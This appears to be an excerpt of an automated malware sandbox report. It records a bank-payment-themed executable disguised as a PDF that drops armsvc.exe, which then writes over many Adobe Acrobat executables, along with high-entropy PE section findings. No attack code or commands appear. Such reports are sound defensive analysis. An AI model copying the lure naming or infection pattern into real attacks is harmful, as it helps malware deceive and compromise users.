                  Source: 7zFM.exe.2.drStatic PE information: section name: .reloc entropy: 7.919208965965003
                  Source: 7zG.exe.2.drStatic PE information: section name: .reloc entropy: 7.914541466416614
                  Source: Acrobat.exe.2.drStatic PE information: section name: .reloc entropy: 7.927565188371514
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .reloc entropy: 7.934263482132398
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.931785288914606
                  Source: pwahelper.exe.2.drStatic PE information: section name: .reloc entropy: 7.928414523184418
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .reloc entropy: 7.929869279620502
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .reloc entropy: 7.928410899512585
                  Source: AcroCEF.exe.2.drStatic PE information: section name: .reloc entropy: 7.92439021332001
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: .reloc entropy: 7.931683844459168
                  Source: AcroCEF.exe0.2.drStatic PE information: section name: .reloc entropy: 7.924401011555415

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
